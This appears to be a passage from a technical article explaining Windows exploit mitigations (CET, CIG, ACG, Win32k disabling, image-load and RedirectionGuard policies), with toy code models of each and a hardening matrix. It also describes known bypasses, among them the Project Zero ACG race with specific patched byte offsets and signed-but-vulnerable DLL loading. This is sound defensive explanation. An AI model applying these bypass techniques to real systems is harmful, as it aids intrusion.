The mechanism, drawn from Intel's CET specification and Microsoft's Windows enabling documents [@cet-techcommunity-wayback, @wiki-intel-cet, @ms-cetcompat]:

Every call instruction now writes the return address twice -- once to the regular stack, and once to the per-thread shadow stack at [SSP].
The shadow-stack page is marked with a dedicated page-table encoding that makes it readable but not writable by general store instructions. Only control-transfer microcode (such as call) and the shadow-stack write instructions WRSS and WRUSS can store to it.
Every ret pops the regular stack and pops the shadow stack and compares. Equal: proceed. Different: raise #CP. On Windows, #CP is routed through the KiRaiseException path as STATUS_STACK_BUFFER_OVERRUN.
New instructions exist for legitimate unwinding. INCSSP advances the SSP past unwound frames, taking the frame count from a register operand -- longjmp and the Windows SEH unwinder both use this. RDSSP reads the current SSP into a register.
The /CETCOMPAT MSVC linker flag, available from Visual Studio 2019 onward, marks an x64 image as shadow-stack-compatible by setting the IMAGE_DLLCHARACTERISTICS_EX_CET_COMPAT bit in the extended DLL characteristics word [@ms-cetcompat].

Tiger Lake shipped CET first, in September 2020. AMD followed with the same shadow-stack specification in Zen 3, launched on November 5, 2020, two months later [@wiki-intel-cet]. The two vendors implement the same shadow-stack instructions, the same page protection, and the same fault. The shadow-stack image format is identical, so Microsoft's Windows enabling code is single-source and runs the same code paths on both.

sequenceDiagram
    participant CPU
    participant RStack as Regular stack
    participant SStack as Shadow stack
    Note over CPU,SStack: function prologue
    CPU->>RStack: push retaddr_A
    CPU->>SStack: push retaddr_A (shadow)
    Note over CPU,SStack: attacker corrupts retaddr_A on regular stack to retaddr_X
    Note over CPU,SStack: function epilogue
    CPU->>RStack: pop -> retaddr_X
    CPU->>SStack: pop -> retaddr_A
    CPU->>CPU: compare retaddr_X vs retaddr_A
    CPU->>CPU: mismatch CP fault then STATUS_STACK_BUFFER_OVERRUN
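The sequence above can be replayed in a toy model. `ShadowStackCpu` is a hypothetical class written for this illustration. It models only the push-twice, pop-and-compare rule, with an ordinary array standing in for the hardware-protected shadow-stack page.

```javascript
// Toy model of the call/ret rule. The regular stack is attacker-writable;
// the shadow stack is only ever touched by call() and ret().
class ShadowStackCpu {
  constructor() {
    this.stack = [];    // regular stack
    this.shadow = [];   // shadow stack
  }

  call(returnAddress) {
    this.stack.push(returnAddress);    // written twice: once here...
    this.shadow.push(returnAddress);   // ...and once on the shadow stack
  }

  ret() {
    const fromStack = this.stack.pop();
    const fromShadow = this.shadow.pop();
    if (fromStack !== fromShadow) {
      throw new Error(
        '#CP: return to 0x' + fromStack.toString(16) +
        ', shadow stack says 0x' + fromShadow.toString(16)
      );
    }
    return fromStack;
  }
}

const cpu = new ShadowStackCpu();

cpu.call(0x401000);
console.log(cpu.ret().toString(16));            // 401000

cpu.call(0x401000);
cpu.stack[cpu.stack.length - 1] = 0xdeadbeef;   // attacker overwrites the return address
try {
  cpu.ret();
} catch (e) {
  console.log(e.message);
}
```

The overwrite itself succeeds, exactly as a stack buffer overflow would. What changes is that the corrupted value can no longer be used by `ret`.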

The Windows policy surface for CET is ProcessUserShadowStackPolicy, structured exactly like every other policy in the enum -- a DWORD of bitfields and a "reserved" tail [@ms-user-shadow-stack-policy]. Ten flags are documented:

EnableUserShadowStack -- turn it on (compatibility mode: only shadow-stack violations in CETCOMPAT-marked modules are fatal)
AuditUserShadowStack -- log without enforcing
SetContextIpValidation -- block SetThreadContext (and the equivalent NtSetContextThread from a peer process) from setting an instruction pointer to an unguarded address
AuditSetContextIpValidation -- log version
EnableUserShadowStackStrictMode -- upgrade from compatibility mode (only CETCOMPAT-module shadow-stack violations are fatal) to strict mode (all shadow-stack violations are fatal, even in non-CETCOMPAT modules)
BlockNonCetBinaries -- the loader refuses to map non-/CETCOMPAT DLLs into the process; strict policy for the most-hardened sandboxes
BlockNonCetBinariesNonEhcont -- like BlockNonCetBinaries, but also requires images to carry /guard:ehcont exception-handling continuation metadata
AuditBlockNonCetBinaries -- log version of BlockNonCetBinaries
SetContextIpValidationRelaxedMode -- permits some legacy patterns
CetDynamicApisOutOfProcOnly -- requires SetProcessValidCallTargets-style operations to come from a peer process
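The difference between compatibility mode and strict mode is easiest to see as a decision function. This is a sketch of the behaviour the flag descriptions above imply, not the kernel's logic: `shadowStackViolationOutcome` is a hypothetical helper, and it models only three of the ten flags.

```javascript
// Sketch of what happens on a shadow-stack violation, per the flag
// descriptions above. Field names mirror the policy flags; the function
// itself is hypothetical and is not a Windows API.
function shadowStackViolationOutcome(policy, moduleIsCetCompat) {
  if (!policy.EnableUserShadowStack) {
    // Audit mode logs without enforcing.
    return policy.AuditUserShadowStack ? 'log' : 'ignore';
  }
  if (policy.EnableUserShadowStackStrictMode) {
    return 'terminate';   // strict mode: fatal in every module
  }
  // Compatibility mode: fatal only in CETCOMPAT-marked modules.
  return moduleIsCetCompat ? 'terminate' : 'continue';
}

const compat = { EnableUserShadowStack: true };
const strict = { EnableUserShadowStack: true, EnableUserShadowStackStrictMode: true };

console.log(shadowStackViolationOutcome(compat, true));    // terminate
console.log(shadowStackViolationOutcome(compat, false));   // continue
console.log(shadowStackViolationOutcome(strict, false));   // terminate
```

The middle case is the one that matters for hardening: in compatibility mode, a legacy module that was never linked with /CETCOMPAT remains a place where a corrupted return address still works.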

The SetContextIpValidation flag is worth a separate paragraph. The original CET shadow-stack design protected against attackers who corrupted return addresses on the regular stack. A more subtle attack used SetThreadContext from a peer process (or, equivalently, the in-process NtSetContextThread) to write a register-state structure containing an attacker-chosen RIP. The thread, when resumed, would jump to that RIP -- with no ret instruction involved, so the shadow stack saw nothing. SetContextIpValidation closes that hole by validating the requested RIP against the bitmap before the kernel resumes the thread. Without it, CET shadow stack has a documented bypass [@ms-user-shadow-stack-policy].

Control Protection exception (#CP): A new CPU exception introduced with Intel CET. Raised when a shadow-stack compare fails on `ret`, when an `endbranch` instruction is missing at an indirect-branch target (for IBT-style CET, separate from shadow stack), or when an attempt is made to write to a shadow-stack page from a non-shadow-stack instruction. Windows routes `#CP` through `STATUS_STACK_BUFFER_OVERRUN`, the same status used for stack-canary violations and CFG failures.

Compose CFG with CET shadow stack and you have the result the entire arc since Aleph One has been pointing at:

Key idea: CFG (forward edge) plus CET shadow stack (backward edge) equals full Control-Flow Integrity on x86-64, from compiler plus hardware. This is the cleanest moment in the article: two mitigations, from two different layers, compose into a property that took twenty years to assemble.

Full CFI is not the same as full security. CET still does not cover three structural attack classes. Call-oriented programming and jump-oriented programming chain gadgets ending in call or jmp rather than ret; the call/return invariant is preserved, so CET sees nothing. COOP chains entire legitimate virtual functions with matching call/return pairs; CET sees nothing. Data-oriented attacks (section 13) never violate any control-flow invariant at all, because they never hijack control flow in the first place.

We have constrained the control flow. We have not constrained which code is in the process. An attacker can still load a malicious-but-signed-looking DLL through the loader, or persuade a JIT to emit attacker-chosen bytes into the JIT heap and then redirect a legitimate call to that JIT-allocated address. That is the code layer, not the control flow layer. The parallel mitigation path -- CIG and ACG -- is what closes it.

7. Code Integrity Guard (CIG): only signed images can load

Even if the attacker can't generate code and can't redirect control flow, they can still ask the loader to do it for them. Plant an attacker-built DLL somewhere the loader will pick it up; LoadLibrary runs the planted DLL's DllMain; you have arbitrary code execution through a trusted entry point. The structural answer is to restrict the universe of DLLs the loader will ever map into a hardened process.

That is the function of Code Integrity Guard. CIG first appeared in Microsoft Edge in Windows 10 1511 (November 2015) [@miller-acg-blog]. The canonical primary on its design is Matt Miller's February 2017 Edge blog Mitigating arbitrary native code execution in Microsoft Edge [@miller-acg-blog]. The corresponding policy in SetProcessMitigationPolicy is ProcessSignaturePolicy, with the bitfield PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY [@ms-binary-signature-policy].

Code Integrity Guard (CIG): A per-process policy that restricts the set of binaries the loader will map into the process to images signed by an allowed code-signing root. Implemented in Windows via the `ProcessSignaturePolicy` mitigation policy. The most common configuration is `MicrosoftSignedOnly`, which restricts loads to Microsoft-rooted catalogue chains. An attempt to bring a DLL that fails the check into the process through `LoadLibrary` / `LoadLibraryEx` / `NtMapViewOfSection` fails with `STATUS_INVALID_IMAGE_HASH` [@miller-acg-blog, @ms-binary-signature-policy].

The policy structure carries three levels:

MicrosoftSignedOnly -- only images chaining to a Microsoft root will load
StoreSignedOnly -- only Microsoft Store-signed images
MitigationOptIn -- the loader accepts any image signed by Microsoft, the Windows Store, or the Windows Hardware Quality Labs (WHQL); the broadest of the three signing-level settings

Plus an AuditMicrosoftSignedOnly audit-only flag that logs without blocking, for compatibility testing in the run-up to enforcement.

User-Mode Code Integrity (UMCI): The kernel subsystem that enforces image-signing policy on user-mode binary loads. UMCI is the user-mode counterpart of KMCI (Kernel-Mode Code Integrity, used by Windows Driver Signature Enforcement and HVCI). CIG calls into UMCI on every `NtMapViewOfSection` to verify that the section's backing image is signed by an allowed root before the loader maps it.

The mechanism is small. Every LoadLibrary, every LoadLibraryEx, and every NtMapViewOfSection consults UMCI (User-Mode Code Integrity). If the image is not signed by a Microsoft-rooted catalogue chain when MicrosoftSignedOnly is in effect, the load returns STATUS_INVALID_IMAGE_HASH [@miller-acg-blog, @ms-binary-signature-policy]. The process keeps running; the DLL just doesn't load. (Most attack chains aren't structured to handle that gracefully, so in practice the process crashes shortly afterward when it tries to dereference a function pointer the failed DLL was supposed to provide.)

CIG is a publisher check, not a content check. A Microsoft-signed DLL with a controllable side effect -- a DLL-search-order hijack against a signed Windows component, or the CVE-2013-3900 Authenticode-padding family that allows a signed binary to carry attacker-controlled trailing data without invalidating the signature -- still loads normally. CIG can't tell. App Control (formerly Windows Defender Application Control) and the Microsoft Driver Block List are the partial answer: a curated list of banned-but-signed binaries UMCI consults and rejects even when their signatures verify.
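The publisher-not-content distinction shows up clearly in a small decision model. Treat this as a sketch under stated assumptions: the signer labels, the `ALLOWED_SIGNERS` table, and `cigCheckLoad` are hypothetical, and the model assumes exactly one signing level is in effect rather than trying to describe how the real flags combine.

```javascript
// Which signers each level admits, following the three levels listed above.
// The signer labels are hypothetical names for this sketch.
const ALLOWED_SIGNERS = {
  MicrosoftSignedOnly: ['microsoft'],
  StoreSignedOnly: ['store'],
  MitigationOptIn: ['microsoft', 'store', 'whql'],
};

// Assumes at most one level is set; flag combinations are not modeled.
function cigCheckLoad(level, image) {
  if (!level) return 'STATUS_SUCCESS';   // no CIG policy installed
  const allowed = ALLOWED_SIGNERS[level];
  if (!allowed) throw new Error('unknown level: ' + level);
  // Only image.signer is consulted. Nothing about the image's contents is.
  return allowed.includes(image.signer) ? 'STATUS_SUCCESS' : 'STATUS_INVALID_IMAGE_HASH';
}

const planted = { name: 'evil.dll', signer: 'none', vulnerable: false };
const signedButVulnerable = { name: 'legacy.dll', signer: 'microsoft', vulnerable: true };

console.log(cigCheckLoad('MicrosoftSignedOnly', planted));               // STATUS_INVALID_IMAGE_HASH
console.log(cigCheckLoad('MicrosoftSignedOnly', signedButVulnerable));   // STATUS_SUCCESS
```

The `vulnerable` field is never read, which is the whole limitation in one line: a blocklist has to supply the judgment that the signature check cannot.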

CVE-2013-3900 was disclosed in December 2013. Microsoft shipped an opt-in registry fix (EnableCertPaddingCheck) and left the strict default off for over a decade for compatibility reasons; in July 2024 the company republished the CVE in the Security Update Guide to formally reaffirm that the strict-Authenticode behaviour remains available as an opt-in across all currently supported releases of Windows 10 and Windows 11 ("Microsoft does not plan to enforce the stricter verification behavior as a default functionality on supported releases of Microsoft Windows") [@nvd-cve-2013-3900]. The structural-vulnerable-but-signed class has been operationally hard to retire for the same reason every backwards-compatibility constraint is hard to retire.

Note: ProcessSignaturePolicy is applied to subsequent loader operations after the policy is installed. DLLs that were already mapped into the process before the call to SetProcessMitigationPolicy are not unloaded retroactively. This is the structural reason serious sandboxed processes (Edge content, Chrome renderer) use UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY) at CreateProcess time -- the kernel installs the policy before the child's first user-mode instruction runs, so even the loader's initial sweep of static imports is policed.

The Microsoft-signed DLL universe is large. Many of those binaries have controllable side effects: search-order hijacks, Authenticode-padding writes, signed-driver privilege primitives, signed-tooling code-injection helpers. CIG does not look at side effects; it only looks at the signature. The residual class that survives `MicrosoftSignedOnly` -- "signed but vulnerable" -- is precisely the class App Control's reactive blocklist tries to keep up with. As of the 2025 Driver Block List there are hundreds of blocked-but-signed binaries; the list grows every quarter. This is one of the unsolved problems the article closes with in section 14.

CIG and ACG are siblings but not synonyms. CIG prohibits loading unsigned images. ACG prohibits generating new executable code at runtime. They defend different attack surfaces. The signed-DLL-injection bypass that defeats CIG does not defeat ACG, because the planted DLL is not generating new code -- it is using its (signed but vulnerable) existing code. The JIT-spray-as-CFG-bypass that defeats ACG does not defeat CIG, because the JIT was not loading a new DLL. An attacker who solves one still has to solve the other.

What does the generation half look like?

8. Arbitrary Code Guard (ACG): W^X for the entire process

April 2017. Windows 10 Creators Update (version 1703) ships. Microsoft Edge enables a single flag in the new ProcessDynamicCodePolicy structure. Any JavaScript engine that wants to run under that flag has to move its JIT somewhere else.

Arbitrary Code Guard (ACG): A per-process policy that prevents *any* code that did not originate as a loader-mapped signed image from becoming executable. With ACG enabled, calls to `VirtualAlloc` with `PAGE_EXECUTE_*` fail with `STATUS_DYNAMIC_CODE_BLOCKED`. Calls to `VirtualProtect` that attempt to *add* execute permission to an existing page fail with the same status. `MapViewOfSection` with `SECTION_MAP_EXECUTE` requires the section's backing image to be signed. The net effect: every executable byte in the process originated as a signed PE mapped by the loader (Microsoft-signed only, when CIG is also on), and nothing else can ever become runnable in this process's address space [@miller-acg-blog, @ms-dynamic-code-policy].

The PROCESS_MITIGATION_DYNAMIC_CODE_POLICY structure carries four flags [@ms-dynamic-code-policy]:

ProhibitDynamicCode -- the core enforcement flag
AllowThreadOptOut -- a thread can exempt itself by calling SetThreadInformation with ThreadDynamicCodePolicy; Microsoft's documentation warns that the opt-out does not provide strong security and is meant only to ease migration toward full dynamic-code restrictions
AllowRemoteDowngrade -- a higher-privileged peer can disable the policy via SetProcessMitigationPolicy
AuditProhibitDynamicCode -- log without enforcing

The structural rule, restated mechanically [@miller-acg-blog, @ms-dynamic-code-policy]:

VirtualAlloc with PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, or PAGE_EXECUTE_WRITECOPY: blocked.
VirtualProtect that adds any executable permission to an existing page: blocked.
MapViewOfSection with SECTION_MAP_EXECUTE for a section not backed by a signed image: blocked.
The only way new executable pages enter the process: the loader maps signed PEs at module load time, and (with CIG also on) only Microsoft-signed PEs.
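The rules above reduce to a small decision table. The sketch below encodes them as listed and nothing more: the request shapes and `acgCheck` are hypothetical, and other restrictions ACG may impose on existing code pages are deliberately left out.

```javascript
const EXECUTE_PROTECTIONS = new Set([
  'PAGE_EXECUTE',
  'PAGE_EXECUTE_READ',
  'PAGE_EXECUTE_READWRITE',
  'PAGE_EXECUTE_WRITECOPY',
]);
const isExecutable = (protection) => EXECUTE_PROTECTIONS.has(protection);

// Hypothetical request shapes. Models only the rules as listed above.
function acgCheck(request) {
  let blocked;
  switch (request.api) {
    case 'VirtualAlloc':
      blocked = isExecutable(request.protection);
      break;
    case 'VirtualProtect':
      // Adding execute permission to a page that lacked it.
      blocked = !isExecutable(request.oldProtection) && isExecutable(request.newProtection);
      break;
    case 'MapViewOfSection':
      blocked = request.mapExecute && !request.backedBySignedImage;
      break;
    default:
      throw new Error('unmodeled API: ' + request.api);
  }
  return blocked ? 'STATUS_DYNAMIC_CODE_BLOCKED' : 'STATUS_SUCCESS';
}

// The classic in-process JIT sequence, step by step.
console.log(acgCheck({ api: 'VirtualAlloc', protection: 'PAGE_READWRITE' }));
console.log(acgCheck({
  api: 'VirtualProtect',
  oldProtection: 'PAGE_READWRITE',
  newProtection: 'PAGE_EXECUTE_READ',
}));
```

The first call succeeds and the second is blocked. An in-process JIT can still write its machine code, but it can never make that code runnable.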

The browser-JIT architectural consequence is the most-cited single change in the entire Windows mitigation literature. Pre-2017, every JavaScript JIT generated native code at runtime into a RWX-permission heap inside its own browser process. The pattern was simple: allocate a page, write machine code into it, mark it executable, jump. ACG turned that pattern into a fatal error.

Chakra, Edge's engine at the time, responded by moving the JIT compilation step out of the renderer process [@miller-acg-blog]; any engine that wants to keep its JIT while the renderer runs under ACG faces the same choice. The architecture became: the renderer ships JavaScript bytecode over an authenticated IPC channel to a JIT process; the JIT process compiles it to machine code; the JIT process owns a signed section backing the compiled output; the renderer maps that signed section read-execute via MapViewOfFile and dispatches into it. The renderer is locked into ACG. The JIT process is not (it has to write code), but it never parses untrusted content itself -- it receives only pre-validated bytecode from the renderer over a typed IPC schema.

Figure: JIT architecture before and after ACG. Pre-ACG (before March 2017): renderer process -> in-process JIT -> RWX JIT heap (W^X violation) -> execute jitted JS. Post-ACG (Edge 1703 and later): renderer (ACG on) sends bytecode over IPC to the JIT process (ACG off); the JIT process backs a shared mapping with a signed section; the renderer maps it R-X via MapViewOfFile and executes the jitted JS in the renderer.

That rearchitecture is the structural cost ACG imposed. It is not small. Out-of-process JIT adds roughly a millisecond per JIT compilation for the IPC round-trip, which matters for short-lived JavaScript (lots of small functions, one-shot pages). It also creates a new trust boundary -- between renderer and JIT process -- which is itself an attack surface, and which the next paragraph names.

The bypass tradition starts almost immediately. Project Zero issue 42450607, reported in December 2017 and publicly disclosed in February 2018, is where James Forshaw and Ivan Fratric document the race-the-mitigation-window class [@p0-issue-42450607, @exploit-db-44467]. The PoC is small enough to summarize in one paragraph.

Each Edge content process (`MicrosoftEdgeCP.exe`) called `SetProcessMitigationPolicy(ProcessDynamicCodePolicy, ...)` on itself shortly after startup. The advisory documents the verbatim callstack: `MicrosoftEdgeCP!SetProcessDynamicCodePolicy+0xc0`. Forshaw and Fratric discovered that there is a window between `CreateProcess` returning the new content process's handle and that child's first call into `SetProcessDynamicCodePolicy`. During that window, a peer content process in the same AppContainer can `OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION)` the new child and `WriteProcessMemory` two specific bytes -- at Edge offsets `0x23090` and `0x23092` on the version Forshaw and Fratric tested, build "up-to-date on Windows 10 version 1709" [@p0-issue-42450607]. The two bytes are global flags that, if set, cause `SetProcessDynamicCodePolicy` to short-circuit and return success without installing the policy. The result: a child renderer that *thinks* ACG is on, that the parent thinks has ACG on, but in which `VirtualAlloc(PAGE_EXECUTE_READWRITE)` succeeds normally. Microsoft's fix was structural: migrate to `UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY)`, so the policy is installed *by the kernel* before the child's first user-mode instruction runs and the race window closes.
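
The ordering problem can be shown with a toy simulation. Nothing here touches real processes: `Child`, `peer_write`, `spawn_racy`, and `spawn_with_attribute` are hypothetical names, and the single `skip_flags` boolean stands in for the two global bytes the advisory describes.

```python
from dataclasses import dataclass, field


@dataclass
class Child:
    """Hypothetical stand-in for a newly created content process."""
    skip_flags: bool = False          # models the two global flag bytes
    acg_on: bool = False
    log: list = field(default_factory=list)

    def set_policy_from_user_mode(self) -> bool:
        # Short-circuits and still reports success if the flags were set.
        if not self.skip_flags:
            self.acg_on = True
        self.log.append("child: SetProcessDynamicCodePolicy -> success")
        return True


def peer_write(child: Child) -> None:
    """A peer process flipping the flags inside the race window."""
    child.skip_flags = True
    child.log.append("peer: wrote the two flag bytes")


def spawn_racy(attacker_wins_race: bool) -> Child:
    """Old design: the child enables ACG itself after it starts running."""
    child = Child()
    if attacker_wins_race:
        peer_write(child)             # lands before the child's own call
    child.set_policy_from_user_mode()
    return child


def spawn_with_attribute() -> Child:
    """Fixed design: the policy is in place before any child code runs."""
    child = Child(acg_on=True)        # applied at creation time
    peer_write(child)                 # too late: nothing consults the flags
    return child
```

In the racy design the child reports success either way, which is why both the child and its parent believe ACG is on; in the attribute-based design there is no user-mode step left to subvert.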

The second-generation bypass came faster than anyone expected. May 2018, Ivan Fratric publishes Bypassing Mitigations by Attacking the JIT Server on the Project Zero blog [@p0-fratric-jit-2018]. Once ACG forced JIT out of process, the new attack surface was the IPC channel and the JIT-server allocation address. Fratric writes: "we believe that any other attempt to implement out-of-process JIT would encounter similar problems." That sentence is the deeper lesson of the entire mitigation tradition: a new trust boundary -- between renderer and JIT process, between user and kernel, between content process and broker -- is a new attack class. You did not eliminate the attack surface; you moved it.

ACG plus CIG, then, closes "what code can run in this process": no unsigned image loads (CIG), no dynamic code generation (ACG), no executable allocations of any kind that did not originate as a signed PE on disk. That is a closed surface for the code dimension. But the attacker has more options than memory and signatures. There is the kernel surface beneath the renderer's syscalls. There is the legacy extension-point loader. There are fonts, image loads, side channels. Those are the smaller, operationally-critical mitigations -- the rest of the twenty.

9. The smaller, operationally critical mitigations

DEP, ASLR, CFG, CET, CIG, ACG -- that is the canonical six. But the PROCESS_MITIGATION_POLICY enum lists twenty-one values [@ms-process-mitigation-enum]. The other fourteen actual policies are not afterthoughts. Each one is a tombstone for a specific attack class that did not fit into "don't let the attacker write code" or "don't let the attacker pick the call target."

`ProcessSystemCallDisablePolicy` -- Disable Win32k System Calls

The canonical user is the Edge content process, from 2017 onward. The Win32k.sys driver implements the GUI subsystem and was, for many years, the single largest contributor to Windows kernel CVEs. A renderer process that does not draw windows can refuse Win32k syscalls entirely, eliminating an enormous swath of kernel attack surface for a compromised renderer. The Edge sandbox blog documents the AppContainer architecture and capability model the renderer runs inside [@edge-sandbox-blog]; the policy enum entry itself is in the SetProcessMitigationPolicy reference [@ms-setprocessmitigationpolicy]. Connor McGarr's 2025 deck addresses the Win32k surface explicitly: "Call targets in Win32k can be corrupted with a valid NT call target" -- which is the structural reason the policy exists [@mcgarr-bhusa25].

`ProcessExtensionPointDisablePolicy`

Disables legacy extension-point classes that have historically been DLL-injection vectors: AppInit_DLLs (registry-driven inject-into-everything), IME modules, Layered Service Providers (LSP, the Winsock provider chain), WinEventHook/SetWindowsHookEx global hooks. Enabling the policy makes the loader refuse to map any DLL through these legacy paths into the process [@ms-setprocessmitigationpolicy, @ms-process-mitigation-enum]. This is one of the lowest-cost mitigations to enable for any process that does not knowingly need legacy IME or LSP integration.

`ProcessFontDisablePolicy`

Refuses non-system fonts. The historical motivation was a 2015 wave of ATMFD.DLL kernel-font-parser CVEs (the Adobe Type Manager font driver). Microsoft moved the font parser out of the kernel into user mode after that wave, and this per-process policy then refuses non-system fonts entirely for browser-class sandboxed processes that do not need them [@ms-setprocessmitigationpolicy].

`ProcessImageLoadPolicy`

Three loader-time flags, all about where a DLL can come from:

NoRemoteImages -- block DLLs whose path is a UNC \\server\share\dll. Eliminates a remote-DLL family that crossed administrative boundaries.
NoLowMandatoryLabelImages -- block DLLs whose file was written by a low-integrity-label process. A compromised sandboxed process could write a DLL to disk; this flag stops a peer broker from picking that DLL up.
PreferSystem32Images -- search \Windows\System32\ before the application directory in the DLL search order. Closes the DLL-search-order-hijack class, a very old attack surface.

All three are in [@ms-image-load-policy]. Together they collapse the DLL-loading attack surface to a small, well-controlled set of code paths.
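
A rough model of the three flags, written as a sketch rather than a description of the loader: `ImageLoadPolicy`, `Candidate`, `search_order`, and `load_allowed` are hypothetical names, the search order is reduced to two entries, and the low-integrity label is represented as a plain boolean.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ImageLoadPolicy:
    no_remote_images: bool = False
    no_low_label_images: bool = False
    prefer_system32: bool = False


@dataclass(frozen=True)
class Candidate:
    """Hypothetical description of one DLL the loader is asked to map."""
    path: str
    low_integrity_label: bool = False


def is_unc(path: str) -> bool:
    """True for \\\\server\\share style paths."""
    return path.startswith("\\\\")


def search_order(policy: ImageLoadPolicy) -> list[str]:
    """Simplified two-entry search order under the policy."""
    order = ["application directory", "System32"]
    return order[::-1] if policy.prefer_system32 else order


def load_allowed(policy: ImageLoadPolicy, cand: Candidate) -> bool:
    """Apply the two blocking flags to a single candidate image."""
    if policy.no_remote_images and is_unc(cand.path):
        return False
    if policy.no_low_label_images and cand.low_integrity_label:
        return False
    return True
```

With all three flags set, a DLL planted next to the executable loses the search-order race, and one dropped by a low-integrity process or served from a share is refused outright.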

`ProcessStrictHandleCheckPolicy`

Causes the process to fault immediately on any use of an invalid handle (use-after-close, double-close, opaque-mismatch) [@ms-setprocessmitigationpolicy]. Handle bugs are an obscure but exploitable class -- a freed kernel object's handle can be reissued, and a process that does not detect this can be tricked into operating on an attacker-controlled replacement. Strict handle checking turns a subtle handle-confusion bug into an immediate crash, before the attacker can pivot.

`ProcessRedirectionTrustPolicy` -- RedirectionGuard

Mitigates symbolic-link, junction, and mount-point confused-deputy attacks. James Forshaw documented the attack family at Project Zero starting in August 2015 with the Windows 10 symbolic-link mitigations post [@p0-forshaw-symlink-2015]. Microsoft shipped the per-process mitigation a decade later, in June 2025 [@msrc-redirectionguard]. RedirectionGuard refuses to traverse a junction if the junction's target was created by a less-trusted user than the process performing the open -- closing the "a low-IL caller plants a junction; a high-IL service follows it" pattern that has been a steady source of local privilege escalation since at least Windows Vista.

RedirectionGuard's June 2025 ship date makes it the freshest entry in the PROCESS_MITIGATION_POLICY enum. The MSRC blog states the structural framing in one sentence: "Junctions remain the biggest existing gap. Outside of a sandbox, they can be created by standard users and target any folder on the system" [@msrc-redirectionguard].

`ProcessSideChannelIsolationPolicy`

Two distinct sub-mitigations [@ms-setprocessmitigationpolicy]:

IsolateSecurityDomain -- on context switch, issue an IBPB (Indirect Branch Predictor Barrier) and apply STIBP (Single Thread Indirect Branch Predictors) so that branch-predictor state is not shared across the boundary. This is the per-process Spectre v2 / MDS side-channel mitigation. Performance cost is real, in the 2-5% range on indirect-branch-heavy workloads, and is the reason this policy is opt-in rather than default.
DisablePageCombine -- prevents the kernel from merging identical physical pages across processes. Page-combining is a memory-saving feature that creates a cross-process side-channel: timing the cost of a write to a shared, copy-on-write page leaks whether the page was previously merged with another process's identical page.

`ProcessUserShadowStackPolicy`

The CET-on switch from section 6 [@ms-user-shadow-stack-policy]. Listed here for enum completeness.

`ProcessChildProcessPolicy`

Refuses any CreateProcess call originating from the process [@ms-setprocessmitigationpolicy]. Edge content processes and Chromium renderers enable this. The structural attack class it closes is "renderer is compromised; renderer spawns cmd.exe or powershell.exe and the attacker pivots to a non-sandboxed cousin." With ProcessChildProcessPolicy on, the renderer cannot spawn anything; the attacker has to either bypass within the sandbox or attack the broker process.

`ProcessPayloadRestrictionPolicy` -- EAF / IAF / ROP checks

The mitigations that EMET originally bundled, carried forward into Windows Defender Exploit Guard [@ms-defender-exploit-protection]: Export Address Filter (EAF), Import Address Filter (IAF), ROP-Stack-Pivot, ROP-Caller-Check, ROP-Sim-Exec. Five sub-mitigations that detect heuristic exploit patterns. The honest assessment: these are defense-in-depth against legacy 32-bit binaries that cannot be recompiled with CFG, XFG, or CET. On modern x64 binaries built with /guard:cf /CETCOMPAT, the payload-restriction checks are largely redundant. They remain useful as a backstop for unrecompilable third-party code that runs in a hardened parent process.

`ProcessASLRPolicy` and `ProcessDEPPolicy`

The per-process knobs on top of the system-wide foundations [@ms-setprocessmitigationpolicy]. ProcessASLRPolicy exposes EnableBottomUpRandomization, EnableHighEntropy, EnableForceRelocateImages, and other refinements -- useful for forcing a paranoid configuration on processes that load third-party DLLs without /DYNAMICBASE. ProcessDEPPolicy is a 32-bit-only vestigial knob; on x64 it does nothing because DEP is unconditionally on.

The other policies

ProcessActivationContextTrustPolicy (restricts manifest-driven activation contexts), ProcessMitigationOptionsMask (a meta-policy returning the mask of supported bits), ProcessSystemCallFilterPolicy (per-process syscall allowlist; rare in production), ProcessUserPointerAuthPolicy (the ARM64-Windows switch for ARM Pointer Authentication, comparatively discussed in section 11), and ProcessSEHOPPolicy (the per-process Structured Exception Handling Overwrite Protection knob -- a Vista-era mitigation predating the modern enum) fill out the enum to twenty-one values. None are individually load-bearing for the article's narrative; they exist for completeness of the kernel ABI.

Twenty policies plus a sentinel. The canonical six handle the control-flow primitives. The other fourteen handle adjacent surfaces. What does it look like when all of these are turned on at once, and which binaries actually do that?

10. What does a maximally hardened modern Windows process look like?

It is one thing to enumerate policies. It is another to ask: who actually turns them on? Where does Microsoft itself enable each one, and what is the structural reason it cannot be enabled on the others?

The fastest way to answer that question is a single matrix. Each column is a binary; each row is a PROCESS_MITIGATION_POLICY value. Each cell is either enabled, or the structural reason it cannot be. The matrix below summarizes the typical Get-ProcessMitigation output for representative binaries, with structural-can't reasons drawn from public Microsoft documentation, Matt Miller's Edge mitigation blog [@miller-acg-blog], and the policy-enum reference [@ms-process-mitigation-enum, @ms-setprocessmitigationpolicy].

Policy	Edge content (`MicrosoftEdgeCP.exe`)	Chrome renderer	Outlook (Office)	Defender (`MsMpEng.exe`)	Recall (Windows AI service)	`Notepad.exe`
DEP / ASLR (system foundation)	yes	yes	yes	yes	yes	yes
CFG	yes	yes	yes	yes	yes	yes
CET shadow stack	yes (strict)	yes	partial	yes	yes (strict)	yes (default)
ACG (`ProcessDynamicCodePolicy`)	yes	yes (with OOP JIT)	no -- COM/MAPI add-ins	no -- engine generates scanner code at runtime	yes	n/a (no JIT)
CIG (`ProcessSignaturePolicy`)	yes (`MicrosoftSignedOnly`)	partial -- plugins	no -- third-party add-ins	yes	yes (`MicrosoftSignedOnly`)	n/a
Disable-Win32k (`SystemCallDisable`)	yes	yes (renderer process)	n/a (GUI)	yes (no GUI)	yes (no GUI)	n/a (GUI)
Disable-Extension-Points	yes	yes	partial	yes	yes	default
Image-Load (all three flags)	yes	yes	partial	yes	yes	default
StrictHandleCheck	yes	yes	yes	yes	yes	yes
ChildProcess	yes	yes	no -- launches `winword`, etc.	yes (no children)	yes (no children)	no
FontDisable	yes	yes	n/a (renders fonts)	n/a	n/a	n/a
RedirectionGuard	yes (since 2025)	yes (since 2025)	partial	yes	yes	partial
SideChannelIsolation	optional	optional	optional	optional	yes (high-trust)	optional
PayloadRestriction (EAF/IAF/ROP)	yes	yes	yes	yes	yes	n/a

